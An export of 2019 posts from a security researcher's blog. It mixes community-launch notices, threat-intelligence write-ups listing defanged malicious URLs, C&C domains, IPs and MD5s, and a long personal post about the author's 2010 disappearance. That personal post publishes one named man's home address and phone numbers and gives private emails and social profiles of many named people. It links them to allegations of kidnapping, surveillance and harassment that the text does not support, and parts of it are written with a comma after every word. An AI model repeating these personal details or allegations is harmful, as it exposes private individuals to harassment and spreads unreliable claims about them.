1. https://ddanchev.blogspot.com/2019/02/historical-osint-peek-inside-georgia.html

2. https://ddanchev.blogspot.com/2008/11/the-ddos-attack-against-bobbearcouk.html

Announcing Offensive Warfare 2.0 - Official Hacking and Security
Community Launch (2019-03-22 15:14)

Dear blog readers, I wanted to let everyone know that I've recently
launched a public [1]hacking and cyber security community repository
offering Security Directory Downloads Podcasts and Security Videos
directory including a countless number of hacking and security
resources including a possible hacking and security discussion
including community-based services and products - to keep the spirit of
the Scene and the Security Industry - the way we know it.

How to obtain access?

- consider approaching me at dancho.danchev@hush.com for the purpose of
requesting an invite

How you can contribute?

- feel free to approach your colleagues and friends including social
network in terms of spreading the word about the portal and the
community

- consider registering making an introduction and starting to
contribute with content

- approach me directly at - dancho.danchev@hush.com with your questions
and possible feature and content suggestion

Looking forward to receiving your response including any additional
questions or comments including suggestions that you might have in
terms of the project.

Stay tuned!

1. https://www.offensive-warfare.com/login/

Dancho Danchev's 2010 Disappearance - An Elaboration - Part Two
(2019-04-04 05:51)

[1]

UPDATE: I can be reached at dancho.danchev@hush.com or at
+359 87 68 93 890 in case of an emergency.

UPDATE: It appears that recently a car belonging to local police
department (hxxp://troyan-police.com; police_troyan@abv.bg) was stopped
somewhere around my place with the lights turned on with the idea to
provoke a possible local police visit.

UPDATE: It appears that my place was visited for a second time by local
police officers (hxxp://troyan-police.com; police_troyan@abv.bg) with
third-party doctors (http://mbal-troyan.com; mbal_troyan@abv.bg) for
the purpose of apparently injecting me and a document for the injection
was signed by someone that I know.

UPDATE: It appears that someone managed to twist my arm and therefore
pressed a pressure on my eye without my knowledge with random people
attempting to communicate with me behind a wall.

UPDATE: It appears that prior to my presentation at InfoSec 2012
someone managed to place a plaque on the wall in Earl's Court and
therefore I experienced a pressure on my head while making a
presentation.

UPDATE: It appears that prior to my presentation visit in Lyon in 2010
someone managed to wound my mouth with something that can be described
as wall interference.

UPDATE: It appears that someone managed to open my eye and therefore
I'm currently experiencing a pressure behind a wall with random people
attempting to communicate with me.

UPDATE: It appears that I'm currently persistently experiencing a
pressure on my mouth including something in the lines of a toxic
chemical on my nose.

UPDATE: It appears that someone managed to map my place including my
head and body using rubber and is persistently trying to communicate
with me.

UPDATE: In case you're interested in contacting me in terms of my law
enforcement issues and potential kidnapping and harassment attempts
including possible interview requests - feel free to approach me at
dancho.danchev@hush.com as I'm currently busy looking for a full time
cybercrime researcher security blogger and threat intelligence analyst
type of position.

I would be also definitely looking forward to sharing some of my
sensitive projects including related work in various other sensitive
areas with the idea to end the ongoing IP (Intellectual Property)
robbery courtesy of a variety of industry-leading companies and
individuals. [2]Has the time come to work hard and set them straight?
It appears so. Feel free to approach me at dancho.danchev@hush.com
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You can use the following PGP key to approach me regarding 
possible [3]career opportunities regarding possible 
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involvement in related sensitive projects at 
dancho.danchev@hush.com or just to say hi request 

[4]Threat Data 

access including a sample or a possible trial or make a 
comment regarding my current and [5]historical OSINT 

research including possible references to my 2010 
disappearance including various cybercrime underground 
chatter 

referencing me and my research including disappearance 
and possible kidnapping including possible GCHQ Lovely 

Horse references and related resources and comments. 

Sample Information Security and Information Warfare 
cartoon circa 2008: 


Second Sample Information Security and Information 
Warfare cartoon circa 2008: 

UPDATE: It appears that someone managed to somehow
place a basketball ball on my head chin and eye and
therefore I'm currently experiencing a pressure on my eye
and my face with people attempting to communicate with me.

UPDATE: It appears that someone is attempting to
communicate with me using pressure pressed on my stomach.

UPDATE: It appears that someone is pressing a doll on a wall
and is attempting to communicate with me including an
increased pressure in my place.

UPDATE: It appears that different people are attempting to
communicate with me behind a wall using a basketball ball
interfering with the pressure in my place.

UPDATE: It appears that the robot has been persistently
sprayed with homo-sexual spray including a possible
female spray leading to a persistent harassment and torture
currently affecting my life-being work-relationships and
intellectual property.

UPDATE: It appears that someone managed to place a box
on the top of the robot for a period of several years
successfully blinding me and restraining me from
remote work activity.

In a related news story regarding my experience and
expertise in the field it appears that the GCHQ has been
actively monitoring me on Twitter including active traffic
monitoring in a 2012 Intelligence Community program labeled -
[6]Lovely Horse that's basically a Palantir implementation
of [7]OSINT practices regarding a certain Twitter account.

The purpose? Active traffic and [8]content monitoring for
the purpose of robbing me out of sensitive research and
related research data which leads me to believe that I've
been successfully contributing to a massive treasure trove
IP (Intellectual Property) theft and robbery courtesy of the
GCHQ and the NSA for a significant period of time.
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- [9]Western Spy Agencies Secretly Rely on Hackers 
for Intel and Expertise 

- [10]LOVELY HORSE: GCHQ Program Monitored 
Hacker/InfoSec Community on Social Media 

- [11]GCHQ's 'Lovely Horse' tool helped spooks
monitor hackers online


- [12]GCHQ created 'Lovely Horse' to keep track of 
top hackers' and security specialists' blogs and 
tweets 

- [13]Spy Agencies Rely on Hackers for Stolen Data 
and Monitoring Security Experts for Expertise 

- [14]GCHQ Create Their Own Tweetdeck To Track 
People of Interest 

- [15]GCHQ siphoned off info stolen by hackers for its
own ends

- [16]Some hackers are unknowingly gathering intel 
for the NSA 

It's also becoming increasingly evident that I'm also a
participant in several other Intelligence Community Programs
that appear to have successfully attempted to rob and
steal my "know-how" leading me to pursue a possible
closed-community data and research sharing or to request
invite-only access to related research and data. Remember
[17]HBGary? It appears that every then and now a
security company tries to re-position the industry by
offering targeted and proprietary Threat Intelligence to a
variety of sources successfully undermining a variety of
community-offered and presented actionable Threat
Intelligence.
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While it's an honor to receive a competing proposition it 
should be noted that the majority of my research is
public excluding several community-driven sensitive projects
that I spend my time working on. It appears that the
time has come for me to take my research to a whole new
level which led me to pursue my own career path
within the Intelligence Community by successfully launching
[18]Disruptive Individuals including the [19]Obmonix -
Cybercrime and Cyber Jihad Fighting Platform
including the eventual launch of the invite-only [20]Threat
Data - The World's Most Comprehensive Threat
Database including a possible [21]career opportunity
with the industry-leading Webroot including a short-term
venture with [22]GroupSense including a possible
[23]SCMagazine 2011 nomination for my Twitter activity
including the [24]upcoming launch of Astalavista Security
Group 2.0 - my primary working location throughout the 90's
with a currently active crowdfunding campaign.

While I continue to be a firm believer that sharing and
communicating actionable Threat Intelligence to a variety
of sources is the appropriate way to proceed and process a
variety of cybercrime-related campaigns and malicious
activity I believe that the time has come for me to take my
research to a whole new level prompting me to seek a
new career opportunity as the [25]World's leading
cybercrime researcher security blogger and threat
intelligence analyst.
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The majority of sources referenced in the original research 
basically represent the majority of [26]my RSS feeds
circa 2006 and it's becoming increasingly interesting
perhaps even funny to figure out that the majority of my
[27]OSINT techniques including active WHOIS monitoring
and research are widely accepted and discussed within
the Intelligence Community.
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What prompted the GCHQ to issue an active traffic and 
Twitter account monitoring campaign? Keep reading - back
in the day throughout the period of 2008-2013 I used to
actively monitor and profile various high-profile nation-state
malicious and fraudulent campaigns including the
[28]infamous Koobface botnet - listen to the [29]original
MP3 interview - which I extensively [30]profiled and
managed to practically take down including the
[31]active exposing of its core [32]botnet master
including the active exposure of client-side exploits being
served through the [33]Koobface botnet through what appears
to be [34]a partnership between the Koobface botnet master
and a well known cybercriminal - Exmanoize a well known
author of a well known Web malware exploitation kit including
the receiving of malware-infected host embedded messages
in response to my "[35]10 things you didn't know
about the Koobface gang" including [36]what appears
to be a [37]direct redirection of Facebook to my
personal blog including yet [38]another message left by
the [39]Koobface gang, including a variety of
[40]typosquatted C&C server domains registered to my name
[41]including extensive [42]Russian Business Network
coverage at the time.

Sample Koobface Botnet Infographic courtesy of 
CyberCamp 2016: 
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It's also worth mentioning that at the time the [43]U.S 
Treasury Department was also redirecting to my
Blogger profile [44]including the active HOST file
modification courtesy of a well known money-mule
recruitment campaign.

Consider going through the following set of resources and
news articles throughout 2008-2013 which can best
describe the Threat Intelligence Scene the way I know it and
the way I'm positive it should be.


Research and News Articles covering my research 
and referencing me throughout - 2008: 

• [45]Russian hacker 'militia' mobilizes to attack
Georgia

• [46]Fraudsters Target Facebook With Phishing Scam 

• [47]Fake Microsoft e-mail contains Trojan virus 
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• [48]Hackers expand massive IFRAME attack to prime 
sites 

• [49]Hackers infiltrate Google searches 

• [50]Hackers expand massive IFrame attack to prime 
sites 

• [51]Hackers knocked Comcast.net offline 

• [52]Adobe investigates Flash Player attacks 

• [53]High-tech bank robbers phone it in 

• [54]Attackers booby-trap searches at top Web sites 

• [55]Carpet bombing networks in cyberspace 

• [56]Storm worm e-mail says U.S. attacked Iran 

• [57]India's underground CAPTCHA-breaking
economy 

• [58]Domain Name Record Altered to Hack 
Comcast.net 




• [59]Google searchers could end up with a new type 
of bug 

• [60]Ongoing IFrame attack proving difficult to kill 

• [61]Hackers expand massive IFRAME attack to prime 
sites 

• [62]Danchev: The small pack Web malware 
exploitation kit 

• [63]Danchev: Massive SQL injection the Chinese way 

• [64]CAPTCHAs are dead - new research from Dancho 
Danchev confirms it 

• [65]Hackers infiltrate Google searches 

• [66]Massive faux-CNN spam blitz uses legit sites to 
deliver fake Flash 

• [67]Faked CNN spam blitz pushes fake Flash 

• [68]Danchev: Anti-fraud site DDOS attack 

• [69]Sony PlayStation site victim of SQL-injection 
attack 

• [70]Fake CNN Alert Still Spreading Malware 

• [71]Look Ma, I'm on CIA.gov 

Research and News Articles covering my research 
and referencing me throughout - 2009: 

• [72]Green Dam exploit in the wild 




• [73]"In gaz we trust": a fake Russian energy
company facilitating cybercrime 

• [74]Don't pay your ransom via SMS 

• [75]NYT scareware scam linked to click fraud botnet 
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• [76]Danchev: A crimeware developer's to-do list 

• [77]Danchev rained on my scareware campaign 

• [78]Is "aggregate-and-forget" the future of
cyber-extortion?

• [79]NYT scareware scam linked to click fraud botnet 

• [80]Microsoft declares war on 'scareware' 

• [81]Don't pay your ransom via SMS 

• [82]Twitter warms up malware filter 

• [83]What's really the safest Web Browser? 

• [84]With Unrest in Iran, Cyber-attacks Begin 

• [85]Zeus bot found using Amazon's EC2 as C&C
server 

Research and News Articles covering my research 
and referencing me throughout - 2010: 

• [86]Firefox add-on encrypts sessions with Facebook, 
Twitter 

• [87]Watch out for malware with those pretty Mac 
screensavers 




• [88]Months-old Skype vulnerability exploited in the 
wild 

• [89]Danchev: Money mule recruiters 

• [90]Cybercrime's bulletproof hosting exposed

• [91]Malware Threatens to Sue BitTorrent 
Downloaders 

• [92]Firefox add-on encrypts sessions with Facebook, 
Twitter 

• [93]Chuck Norris Botnet Karate-chops Routers Hard 

Research and News Articles covering my research 
and referencing me throughout - 2011: 

• [94]Kaspersky disputes McAfee's Shady Rat report 

• [95]Has EV-SSL Growth Been Slow? 

• [96]Report: Vishing Attack Targets Skype Users 

Research and News Articles covering my research 
and referencing me throughout - 2012: 

• [97]Fake UPS notices deliver malware 

• [98]ZeuS/Zbot Trojan Spread Through Rogue US 
Airways Email 

• [99]New Skype malware threat reported: Poison Ivy 

• [100]Five Koobface botnet suspects named by New 
York Times 
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• [101]Virtual jihad: How real is the threat? 

• [102]Is the death knell sounding for traditional
antivirus? 

• [103]Can the Nuclear exploit kit dethrone 
Blackhole? 

• [104]Experts split over regulation for
bounty-hunting bug sniffers

• [105]Spammers Using Fake YouTube Notifications to 
Peddle Drugs 

• [106]Adele Bests Adderall As Affiliate Spammers 
Offer Music Downloads 

• [107]Bulgarian sleuth unveils botnet operators 

• [108]Fake PayPal Emails Distributing Malware 

• [109]Web Gang Operating in the Open 

• [110]ZeuS/Zbot Trojan Spread Through Rogue US 
Airways Email 

• [111]Buy 500 hacked Twitter accounts for less than
a pint 

• [112]NBC.com Hacked, Infected With Citadel Trojan 

Research and News Articles covering my research 
and referencing me throughout - 2013: 

• [113]How Much Does A Botnet Cost? 

• [114]Automated YouTube account generator offered 
to cyber crooks 



• [115]Upgraded Modular Malware Platform Released 
in Black Market 

• [116]Deconstructing the Al-Qassam Cyber Fighters 
Assault on US Banks 

• [117]NBC hack infects visitors in 'drive by' 
cyberattack 

• [118]Bitcoins are being traded for hack tools 

• [119]New DIY Google Dorks Based Hacking Tool 
Released 

• [120]Hacking The TDoS Attack 

• [121]Mass website hacking tool alerts to dangers of 
Google dorks 

• [122]Cybercrime service automates creation of fake 
scanned IDs 

• [123]Spammers unleash DIY phone number slurping 
web tool 

• [124]Spam email contains malware, not Apple gift 
card 

• [125]APT1, that scary cyber-Cold War gang: Not 
even China's best 

• [126]Mass website hacking tool alerts to dangers of 
Google dorks 

• [127]C&C PHP script for staging DDoS attacks sold
on underground forums 



• [128]Russian Malware-as-a-Service Offers Up Server 
Rentals for $240 a Pop 

• [129]Java exploit kit sells for $40 per day 
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• [130]Buggy DIY botnet tool leaks in black market 

• [131]New DIY Google Dorks Based Hacking Tool 
Released 

• [132]Botnets for rent, criminal services sold in the 
underground market 

• [133]Spam email contains malware, not Apple gift 
card 

UPDATE: It appears that someone placed a remote robot at
local police department capable of recording my life
including my life-being leading to a ruined career work
relationships and intellectual property.

UPDATE: It appears that an unknown group of people is
attempting to communicate with me using a transmitter on
my mouth using plastic paper in their mouth.

UPDATE: It appears that someone is permanently trying to
hide my eyes using plastic paper apparently using
a transmitter that's been apparently placed on my mouth. It
also appears that the person behind the transperant is
attempting to move closely thereby ruining my equipment
and life-being.

UPDATE: It appears that the transperant is operated by
someone relying on lenses including bottles to map and
touch-point related activities of an individual in place
following persistent harassment and life-being manipulation.

In a related news article - "[134]ZDNet Security Blogger
Goes Missing in Bulgaria" covering my disappearance I
came across to a juicy comment referencing the work of a
well-known artist which leads me to research a little bit
further leading me to the following CD/Vinyl label - "Blue
Sabbath Black Cheer / Griefer - We Hate You / Dancho Danchev
Suck My Dick" courtesy of the following individual.
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Take into consideration the following brief post regarding the 
associated individual: 

" It's 2010 and I'm stumbling upon a defaced image of my 
head shot (circa 2006). I never actually bothered about what
others say, even when they insist that I'm maliciously
enjoying the fact that I profile, expose, and disrupt
cybercrime campaigns when there's no time for enjoyment,
as the stakes are too high.

The defaced headshot is part of the released back in 2010
album "We Hate You/Dancho Danchev S*ck my D*ck" by the
Blue Sabbath Griefer group.
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So who's behind this "black PR" campaign? Who's the 
mysterious Photoshop-er? It's a [135]Canadian music artist 

called [136]Ron Brogden, who spends his spare time coding 
for hire, when he's not photoshoping my head shots. 

Hatred-friendly domain name reconnaissance: 

deterrent.net - 95.142.172.70 - Email: siave@codegrunt.com 

Domain owner: Ron Brogden, Secondary emai: 
moron@industrial. org 

Music Label Address: PO. Box 8021; Victoria, BC, Canada; 
V8W3R7 

Home address: 647 Speed Avenue, Victoria, British Columbia, 
V8Z 1A5 

Phone: +1.250-360-0372; +1.250-381-0088 

Responding to the same IP are also the following 
domains operated by Ron: 

codegrunt.com 

deterrent.net 

industrial, org 


nuckflix. com" 
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In terms of my 2010 disappearance I also recently came 
across to the following [137]screenshots courtesy of the
cybercrime-friendly forum Darkode courtesy of an individual
known as Xylitol discussing my disappearance including
a possible Hitman Request charging at $10,000.
Unfortunately, the screenshots were taken using the name of
Nassef with whom Xylitol shared his accounting details with
me including the taking of the screenshots.
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UPDATE: It appears that my 2010's disappearance is slowly 
turning into a modest [138]kidnapping attempt on behalf
of Bulgarian law enforcement in constitution with DANS
(State Agency for National Security) who appear to have
been operating a long-turn operation to ruin my reputation
intellectual property and work relationships successfully
holding me a hostage for a period of seven years following a
long-run kidnapping and harassment attempts leading
to a ruined career intellectual property violation and work
relationships.

Operating a remotely-operated gas pomp with azbest
targeted at my place Bulgarian law enforcement in
constitution with DANS (State Agency for National Security)
appear to have successfully tracked down and manipulated
my life-being following a successful set of long-run
kidnapping and harassment attempts leading to a
successfully ruined career intellectual property violation
and work relationships.

It appears that Bulgarian law enforcement in constitution
with DANS (State Agency for National Security) have
placed remote stickers on my place and have managed to
successfully map my place leading to a successful illegal
entry courtesy of an unknown person followed by another
unknown person supposedly a colleague followed by
an illegal entry courtesy of unknown police officers who took
my ID and escorted me to a local institution without
explaining the reason for holding me hostage there.

It appears that the group is operating a transperant using
feelings to map and touch point related activities of
the individuals in place following a successful kidnapping
and harassment attempt leading to illegal entry and
possible kidnapping attempt. It appears that Bulgarian law
enforcement in constitution with DANS (State Agency
for National Security) have managed to place a plastic sticker
in my mouth leading to a successful monitoring and
tracking including the use of a transperant leading to a
successful kidnapping and harassment attempt leading to a
ruined career intellectual property violation and work
relationships.

UPDATE: [139]Great News: Missing Cybersecurity
Expert Dancho Danchev Is No Longer Missing,
[140]We need help with the strange disappearance of Dancho
Danchev, [141]Security Researcher, Cybercrime Foe
Goes Missing, [142]Dancho Danchev: Missing cybersecurity
expert, [143]Cybercrime Blogger Vanishes After
Finding Tracking Device In His Bathroom, [144]Zero Day
blogger Dancho Danchev: he's back, [145]The
Strange Disappearance of Dancho Danchev, [146]We need help
with the strange disappearance of Dancho Danchev,
[147]Mystery Surrounds Cyber Security Blogger Dancho
Danchev's Whereabouts, [148]Update on Dancho Danchev,
[149]ZDNet Security Blogger Mysteriously Disappears,
[150]ZDNet Blogger Disappears Mysteriously In
Bulgaria, [151]ZDNet Blogger Disappears Under Mysterious
Circumstances

UPDATE: Prior, to, my, stay, in, another, town, I, was,
contacted, by, Riva Richmond, (riva@rivarichmond.com),
and, set, up, a, meeting, to, discuss, a, potential,
New York Times, article.

UPDATE: Prior, to, my, stay, at, this, particular, apartment, I, 
contacted, Nart Villeneuve, (n.villeneuve@secdev.ca), 
seeking, assistance, signaling, potential, trouble. 

UPDATE: Prior, to, my, stay, at, a, local, institution
(dpblovech@abv.bg), for, a, period, of, three, months, the,
same, person, Kamen Kovachev (Kamen Tzura)
(tsyrov@abv.bg), was, released, by, another, person,
known, as, Nesho Sheygunov
(https://www.facebook.com/nesho.sheygunov).

UPDATE: While, my, stay, at, a, local, institution
(dpblovech@abv.bg), for, a, period, of, three, months,
another, person, that, I, know, Kamen Kovachev (Kamen Tzura)
(tsyrov@abv.bg), was, taken, to, the, room, where, I,
was, confined, and, I, spent, a, night, in, the, corridor.
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UPDATE: While, I, was, taken, to, a, local, institution 
(dpblovech@abv.bg), for, a, period, of, three, months, I, 
had, my, phone, taken, and, I, was, confined. 

UPDATE: While, I, was, taken, out, of, my, place, to, an,
unknown, car, the, fuel, was, charged, to, someone,
that, I, know.

UPDATE: Prior, to, my, stay, at, a, local, institution 
(dpblovech@abv.bg), I, was, offered, to, take, vitamins. 

UPDATE: My, place, was, recently, visited, by, unknown,
men, taking, me, to, local, police, department
(hxxp://troyan-police.com; police_troyan@abv.bg),
and, asking, me, to, write, that, my, equipment, was,
interfering, with, that, of, local, police, department.
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UPDATE: It, appears, that, someone, has, taken, the, time, 
and, effort, to, take, a, t-shirt, of, mine. 

UPDATE: Prior, to, my, visit, at, a, local, hotel,
(hxxp://central-hotel.com/en; central@central-hotel.com),
some, of, my, clothes, were, missing.

UPDATE: It, appears, that, my, place, was, recently,
supposedly, visited, by, Plamen, Dakov
(hxxp://universalstroi.com), Hristo, Radionov
(hxxp://universalstroi.com;
hxxp://www.facebook.com/hristo.radionov), and, Ivailo,
Dochkov (hxxp://www.facebook.com/ivodivo), who,
left, money, for, me.

UPDATE: Prior, to, my, attendance, in, a, local,
institution (dpblovech@abv.bg), Ivailo, Dochkov
(hxxp://www.facebook.com/ivodivo), tried, to, meet, me.


UPDATE: Prior, to, my, attendance, at, this, particular,
apartment, I, was, invited, by, Briana Papa
(Briana@crenshawcomm.com), to, visit, Prague, on, behalf, of,
Avast! Software, where, I, met, with, Vince Steckler
(steckler@avast.com), and, Miloslav, Korenko
(korenko@avast.com), where, I, met, with, Lucian
Constantin (hxxp://twitter.com/lconstantin).

Prior, to, my, attendance, at, this, apartment, I, was, also,
invited, to, another, event, held, at, INTERPOL, by, Steve
Santorelli (steve.santorelli@gmail.com), which, I,
successfully, attended, and, presented, at, where, I, also,
met, with, Krassimir Tzvetanov (krassi@krassi.biz).

Something, else, worth, pointing, out, is, that, my, place, is,
visited, by, an, unknown, woman, known, as, Boriana Mihovska,
an, unknown, man, known, as, Leonid, an, unknown, person,
known, as, Tzvetan Georgiev
(hxxp://www.youtube.com/user/laron640;
tzvetan.leonid@gmail.com);
(hxxp://plus.google.com/107108766077365473231),
and, an, unknown, person, known, as, Dobrin Danchev
(hxxp://www.facebook.com/dobrin.danchev);
(hxxp://www.sibir.bg/parachut), and, another, unknown,
person, known, as, Ina, Dancheva
(http://otkrovenia.com/bg/profile/innadancheva).

The, most, recent, visit, to, my, place, was, by, a, person,
known, as, Vasil, Stanev, from DANS (dans@dans.bg), who,
was, supposedly, asking, me, to, take, a, job, and,
consequently, asked, me, to, attend, a, doctor, session.



Dear, blog, readers, I, feel, it's, about, time, I, post, an,
honest, response, regarding, my, [152]disappearance, in,
[153]2010, with, the, [154]purpose, of, [155]information, my,
[156]readers, on, my, [157]current, situation, and,
[158]to, continue, [159]posting, and, contributing, valuable,
threat, intelligence, to, the, security, community.

In, 2010, I, moved, to, an, apartment, located, in, another,
town, and, apparently, my, apartment, have, been,
vandalized, including, persistent, harassment, by, my,
neighbors, including, a, possible, illegal, entry, courtesy, of,
the, person, responsible, for, hiring, the, apartment (Kalin
Petrov; kalin_petrov@hotmail.com).

After, a, persistent, chase, down, and, harassment, courtesy,
of, the, person, responsible, for, hiring, the, apartment,
I, received, a, notice, to, leave, and, had, my, apartment,
visited, by, the, person, responsible, for, hiring, including,
another, man, including, another, man, that, was,
supposedly, supposed, to, take, care, of, my, belongings.

Prior, to, my, accommodation, I, was, contacted, by, Pauline,
Roberts (pauline.roberts@ic.fbi.gov), who, recommended,
me, to, Yavor, Kolev (javor.kolev@gmail.com),
and, Albena, Spasova (albaadvisors@gmail.com), from,
Bulgarian, local, authorities, followed, by, a, series, of,
communication.

Prior, to, returning, to, my, place, in, 2011, my, house, was,
vandalized, by, three, police, officers
(hxxp://troyan-police.com; police_troyan@abv.bg), from, the,
local, police, department, who, entered, my, house, in,
particular, my, bedroom, and, unpolitely, asked, me, to,
dress, while, showing, me, a, copy, of, my, personal, ID,
that, I, haven't, presented, and, taking, me, to, an,
unknown, car, without, explaining, the, reason, for,
taking, me.
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Sample Email communication between me, Pauline 
Roberts, Javor Kolev and Albena Spasova circa 2010: 


Original message sent by Pauline Roberts - 2010 
Second email received from Pauline Roberts - 2010 
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Original message received by Albena Spasova - 2010 

Original response issued to Pauline Roberts, Javor 
Kolev, and Albena Spasova - 2010 


Original response issued to Pauline Roberts, Javor 
Kolev, and Albena Spasova - 2010 - Part Two 

Original message received by Albena Spasova - 2010 
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Original response issued by Javor Kolev - 2010 

Original response issued to Javor Kolev - 2010 

Original response issued by Javor Kolev - 2010 - Part 
Two 


Original response issued to Javor Kolev - 2010 - Part 
Two 
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Original response issued by Javor Kolev - 2010 - Part 
Three 

Original response issued to Javor Kolev - 2010 

Original response issued by Javor Kolev - 2010 - Part 
Four 
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Original response issued to Javor Kolev - 2010 

Original response issued by Javor Kolev - 2010 - Part 
Five 
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Original response issued to Javor Kolev - 2010 

Original response issued by Javor Kolev - 2010 - Part 
Six 
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A, few, hours, later, I, find, myself, located, in, an, institution 
(dpblovech@abv.bg), for, a, period, of, three, months, 
without, anyone, explaining, the, reason, for, holding, me, 
there. 

Upon, entering, I, had, my, phone, taken, without, having,
received, any, sort, of, explanation, for, taking, me,
and, holding, me, there.

UPDATE: My most recent visit to local police department
was to announce a possible food-poisoning and I
was told not to live in my place.

Given, this, circumstances, I, feel, that, it, has, become,
highly, unproductive, to, continue, my, work, and,
therefore, I'm, currently, seeking, a, permanent, relocation,
including, a, possible, full, time, career, opportunity, in,
the, field, of, cybercrime, research, security, blogger, or,
threat, intelligence, analyst.
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In case you're aware of someone looking to hire full-time 
threat intelligence analyst cybercrime researcher or a
security blogger feel free to approach me at
dancho.danchev@hush.com
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Introducing Unit-123.org - Cyber Threat Intelligence 
Portal (2019-04-12 21:41) 


Dear blog readers, I wanted to take the time and effort and
introduce you to my latest project called [1]Unit-123.org
where you can find quality research articles in a variety of
topics that I will be publishing on a daily basis with the
idea to bring back the spirit of my editorial years and to
continue spreading quality data information and knowledge
to a loyal base of users and readers.

Feel free to reach me at dancho.danchev@hush.com

Stay tuned!
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Flashpoint Intel Official Web Site Serving Malware - 
An Analysis (2019-04-22 08:32) 

UPDATE: Flashpoint Intel issued a [1]response to my
research.

UPDATE: [2]SCMagazine picked up the story.

UPDATE: [3]Anti-Malware.name picked up the story.

UPDATE: [4]EnterpriseTimes picked up the story.

UPDATE: [5]Rambler News picked up the story.

It appears that [6]Flashpoint's official Web site is
currently embedded with malware-serving malicious script
potentially exposing its visitors to a multitude of malicious
software.


Original malicious URL hosting location: 

hxxp://www.flashpoint-intel.com/404javascript.js 
hxxp://www.flashpoint-intel.com/404testpage4525d2fdc



Related malicious URL redirection chain: 


Second sample URL redirection chain: 


Related legitimate URL known to have participated in the campaign:

hxxp://boards.greenhouse.io/flashpoint/jobs/4125871002?gh_jid=4125871002

Related malicious URL redirection chain: 

hxxp://unanimous.live/ - 104.28.24.233- 
hxxp://jsc.adskeeper.co.uk/a/d/adw.toolbar.com.333699.js 

hxxp://destinywall.org/redirect?type=555& - 176.123.9.53 -> hxxp://ermoyen.tk/index/?4831537102803 - 37.230.116.105

Related malicious URLs known to have participated in 
the campaign: 


Related malicious domains known to have 
participated in the campaign: 


Related malicious and fraudulent IPs known to have 
participated in the campaign: 

Related malicious MD5s known to have participated in the campaign:

Related malicious and fraudulent URLs known to have 
participated in the campaign: 


Related malicious and fraudulent domains known to 
have responded to 109.234.39.160: 


Related malicious and fraudulent domains known to 
have responded to 37.230.116.105: 

Related malicious and fraudulent domains known to have participated in the campaign (138.68.113.179; 172.64.196.39; 172.64.197.39; 104.27.170.199; 104.27.171.199):

1. https://www.flashpoint-intel.com/blog/after-action-report-flashpoint-remediation-of-0-day-exploit-on-our-public-facing-website/

2. https://www.scmagazine.com/home/security-news/flashpoint-our-site-was-not-dishing-malware/

3. https://www.anti-malware.name/news/expert-accused-intel-flashpoint-website-in-spread-of-malware-while-company-denies-accusations/

4. https://www.enterprisetimes.co.uk/2019/04/26/flashpoint-reacts-to-claim-website-served-malware/

5. https://news.rambler.ru/internet/42088442-sayt-flashpoint-rasprostranyaet-vredonos-flashpoint-net/

6. https://www.flashpoint-intel.com/

Exposing Yet Another Currently Active Fraudulent and Malicious Pro-Hamas Online Infrastructure (2019-05-04 19:45)

Love them or hate them, the ubiquitous "beautiful girl" scam campaigns that use fake, bogus and rogue Facebook accounts, courtesy of Hamas and targeting Israeli soldiers, have to come to an end.

In this post I'll provide actionable intelligence on a currently active Pro-Hamas malicious and fraudulent infrastructure, discuss in depth the tactics, techniques and procedures of the cybercriminals behind it, and offer an in-depth perspective on a currently active Pro-Hamas hosting provider, "[1]Nepras for Media & IT", which is basically a legitimate front-end company currently involved in providing a variety of Pro-Hamas malicious and fraudulent malware-serving and propaganda-spreading online infrastructure, and which is directly related to yet another Pro-Hamas franchise, "Modern Tech Corp".

Sample Facebook Profile Names involved in the campaign:

Elianna Amer
Aitai Yosef
Karen Cohen
Amit Cohen
Loren Ailan
Verena Sonner
Lina Kramer

Sample profile photos of Pro-Hamas fake and rogue Facebook accounts:

Sample malicious and fraudulent URL known to have participated in the campaign:

hxxp://apkpkg.com/android/?product=yeecallpro - 50.63.202.43; 50.87.148.131; 50.63.202.56

Related malicious MD5s known to have participated 
in the campaign: 


Related malicious and fraudulent domains known to 
have participated in the campaign: 


Related malicious IPs known to have participated in 
the campaign: 

hxxp://107.175.144.26 

hxxp://192.64.114.147

Related malicious and fraudulent phone-back C&C server IPs:

hxxp://endpointup.com/update/upfolder/updatefun.php
hxxp://droidback.com/pockemon/squirtle/functions.php

Related malicious and fraudulent domains known to have participated in the campaign:

hxxp://androidbak.com
hxxp://droidback.com
hxxp://endpointup.com
hxxp://siteanalysto.com
hxxp://goodydaddy.com

Related emails known to have participated in the 
campaign: 

info@palgoal.ps 

support@nepras.com 

mtcg@mtcgaza.com 

Related fraudulent and malicious domains known to 
have been registered using the same email - 
info@palgoal.ps: 


Related fraudulent and malicious domains known to have been registered using the same email - support@nepras.com:


Related domains registered using "Nepras for Media & IT" infrastructure:

Related domains registered using the "Modern Tech Corp" Pro-Hamas fraudulent and malicious infrastructure:


Related malicious MD5s known to have participated 
in the campaign: 


Related certificates known to have participated in 
the campaign: 

Related malicious MD5s known to have participated in the campaign including C&C phone-back locations:

MD5: 8f1b709ae4fb41b32674ca8c41bfcbf7 - once executed the sample phones back to the following malicious domain - hxxp://jonalbertwebsite.000webhostapp.com

MD5: 95a782bd8711ac14ad76b068767515d7 - once executed the sample phones back to the following malicious domains - hxxp://107.175.144.26/apps/d/p/op.php -> hxxp://app-measurement.com/config/app/1:48705006578-9:android:6a899b85b4fafd55?app_instance_id=76d4b711c98c3632398d47cb8d5777a3&platform=android&gmp_version=11200

MD5: 5b2aac6372dea167c737b0036e1bd515

MD5: f6ffa064a492e91854d35e7f225b1313 - once executed the sample phones back to the following malicious domain - hxxp://192.64.114.147/apps/d/p/op.php

MD5: b3e40659ae0a0852e2f6eb928d402d9d

MD5: 7a9503152b4c8c1ee80ac7daf5405a91


Related malicious URL known to have participated in 
the campaign: 

hxxp://bit.ly/2M7E2Zg 

1. https://www.terrorism-info.org.il/Data/articles/Art_20397/E_188_12_177323293.pdf

Historical OSINT - Profiling the Loads.cc Enterprise (2019-05-04 22:27)

Remember [1]loads.cc? In this post I'll provide actionable intelligence on the popular DDoS for hire service circa 2008 and offer an in-depth perspective on the tactics utilized by the gang behind the service for the purpose of earning fraudulent revenue in the process of monetizing access to malware-infected hosts.

Sample malicious and fraudulent infrastructure known to have participated in the campaign:

hxxp://loads.cc - hxxp://nsl.udnska.cn (72.21.52.99). Interestingly, hxxp://sateliting.cn is the C&C for the hxxp://loads.cc service.

Related malicious and fraudulent URLs known to 
have participated in the campaign: 


Related malicious IPs known to have responded to 
sateliting.cn: 


Related malicious MD5s known to have participated 
in the campaign: 


1. https://ddanchev.blogspot.com/2008/03/loadscc-ddos-for-hire-service.html

